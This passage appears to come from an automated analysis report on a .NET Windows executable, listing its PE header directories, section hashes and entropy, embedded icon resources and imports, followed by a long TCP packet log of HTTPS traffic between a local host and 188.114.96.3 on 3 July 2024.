                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9c3e0 | 0x4b | .text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9e000 | 0x51a74 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf0000 | 0xc | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x2000 | 0x9a434 | 0x9a600 | 4c24049b539673ae99932000d4a9633a | False | 0.3992203314777328 | data | 5.659985517161451 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc | 0x9e000 | 0x51a74 | 0x51c00 | 785506ae94b612c050628b732e67a769 | False | 0.07133385894495413 | data | 2.3516735382701657 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0xf0000 | 0xc | 0x200 | 7367d71016122531e9851e5b512c9cc7 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_ICON | 0x9e370 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 |  |  | 0.7601351351351351
                          RT_ICON | 0x9e498 | 0x368 | Device independent bitmap graphic, 16 x 32 x 24, image size 832 |  |  | 0.7155963302752294
                          RT_ICON | 0x9e800 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 |  |  | 0.6826241134751773
                          RT_ICON | 0x9ec68 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 |  |  | 0.5389784946236559
                          RT_ICON | 0x9ef50 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3200 |  |  | 0.470679012345679
                          RT_ICON | 0x9fbf8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 |  |  | 0.4378517823639775
                          RT_ICON | 0xa0ca0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1536 |  |  | 0.36402439024390243
                          RT_ICON | 0xa1308 | 0x1ca8 | Device independent bitmap graphic, 48 x 96 x 24, image size 7296 |  |  | 0.33110687022900764
                          RT_ICON | 0xa2fb0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 |  |  | 0.30881742738589213
                          RT_ICON | 0xa5558 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2560 |  |  | 0.2924174174174174
                          RT_ICON | 0xa5fc0 | 0x3228 | Device independent bitmap graphic, 64 x 128 x 24, image size 12800 |  |  | 0.26580996884735203
                          RT_ICON | 0xa91e8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 |  |  | 0.24244213509683515
                          RT_ICON | 0xad410 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 |  |  | 0.014139568600763382
                          RT_GROUP_ICON | 0xef438 | 0xbc | data |  |  | 0.5797872340425532
                          RT_VERSION | 0xef4f4 | 0x3ca | data |  |  | 0.4175257731958763
                          RT_MANIFEST | 0xef8c0 | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators |  |  | 0.5642201834862385
                          DLL | Import
                          mscoree.dll | _CorExeMain
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Jul 3, 2024 18:08:12.128777981 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.128844023 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.128875971 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.128900051 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.128902912 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.128916979 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.128947973 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.129699945 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.129748106 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.129754066 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.178356886 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.218667984 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.218751907 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.218770027 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.218806982 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.218825102 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.218861103 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.218880892 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.218945026 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.218987942 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.218996048 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.219038963 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.219206095 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.219240904 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.219264984 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.219273090 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.219295025 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.219868898 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.219922066 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.219928980 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.219974995 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.220118046 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.220174074 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.220820904 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.220855951 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.220875025 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.220881939 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.220905066 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.221643925 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.221698999 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.221707106 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.221760988 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.222347021 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.222400904 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.222598076 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.222661972 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.222843885 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.222898006 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.223211050 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.223263025 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.223515987 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.223565102 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.223748922 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.223803997 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.309812069 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.309854031 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.309910059 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.309933901 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.309947014 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.309973955 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.309988976 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.310038090 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.310138941 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.310187101 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.310297012 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.310343981 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.310735941 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.310789108 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.310976028 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.311033964 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.311140060 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.311199903 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.312218904 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.312278986 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.312402010 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.312457085 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.312561035 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.312618971 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.312664032 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.312700033 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.312720060 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.312726021 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.312747002 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.313021898 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.313138008 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.313146114 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.313199997 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.313332081 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.313390970 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.313469887 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.313528061 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.313709021 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.313767910 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.314228058 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.314285994 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.314440966 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.314495087 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.314677954 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.314733982 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.314820051 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.314876080 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.315275908 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.315332890 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.315495968 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.315552950 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.315680981 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.315737009 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.316235065 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.316284895 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.316397905 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.316450119 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.401299953 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.401320934 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.401351929 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.401415110 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.401429892 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.401442051 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.402004004 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.402021885 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.402061939 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.402070045 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.402112007 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.403045893 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.403062105 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.403115988 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.403125048 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.403155088 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.403768063 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.403783083 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.403842926 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.403851032 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.403866053 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.403882027 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.403922081 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.403928995 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.403960943 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.404728889 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.404742956 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.404791117 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.404798031 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.404810905 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.414849997 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.414880037 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.414961100 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.414969921 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.415519953 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.415535927 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.415580034 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.415586948 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.415606976 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.459695101 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.491527081 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.491558075 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.491667986 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.491688967 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.491728067 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.491758108 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.492294073 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.492311954 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.492379904 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.492388964 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.492427111 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.493037939 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.493055105 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.493115902 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.493124008 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.493165016 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.493743896 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.493758917 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.493830919 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.493839025 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.493882895 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.493952990 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.493969917 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.494141102 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.494149923 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.494199991 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.495500088 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.495517969 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.495579004 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.495585918 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.495626926 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.497447014 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.497463942 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.497529984 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.497535944 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.497595072 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.497991085 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.498039007 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.498054028 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.498061895 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.498095989 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.498107910 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.922751904 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.922772884 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.922813892 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.922909975 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.922940969 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.922955990 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.922988892 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.923434973 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.923454046 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.923532009 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.923541069 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.923587084 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.923679113 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.923705101 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.923742056 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.923748970 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.923788071 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.923808098 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.924551010 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.924567938 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.924623966 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.924631119 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.924671888 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.925501108 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.925517082 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.925570965 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.925576925 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.925616026 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.927277088 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.927299023 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.927350998 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.927355051 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.927367926 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.927407026 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.927432060 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.927490950 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.928636074 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.928663015 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.928713083 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.928721905 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.928730011 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.928747892 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.928757906 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.928792000 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.928797007 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.928826094 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.928850889 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.929301977 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.929316998 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.929373980 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.929380894 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.929450035 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.930033922 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.930049896 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.930109024 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.930118084 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.930162907 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.930742025 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.930757999 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.930814981 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.930820942 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.930849075 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.930855036 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.930861950 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.930877924 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.930902004 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.930938959 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.930943966 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.930989027 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.931977034 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.931993008 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.932044983 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.932053089 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.932094097 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.932570934 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.932586908 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.932642937 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.932653904 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.932693005 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.933063984 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.933087111 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.933140993 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.933150053 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.933190107 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.934007883 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.934024096 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.934082985 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.934086084 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.934099913 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.934115887 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.934139013 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.934151888 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.934176922 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.934190035 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.934878111 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.934905052 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.934946060 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.934952974 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.934983969 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.935004950 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.935354948 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.935369015 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.935430050 CEST49707443192.168.2.8188.114.96.3
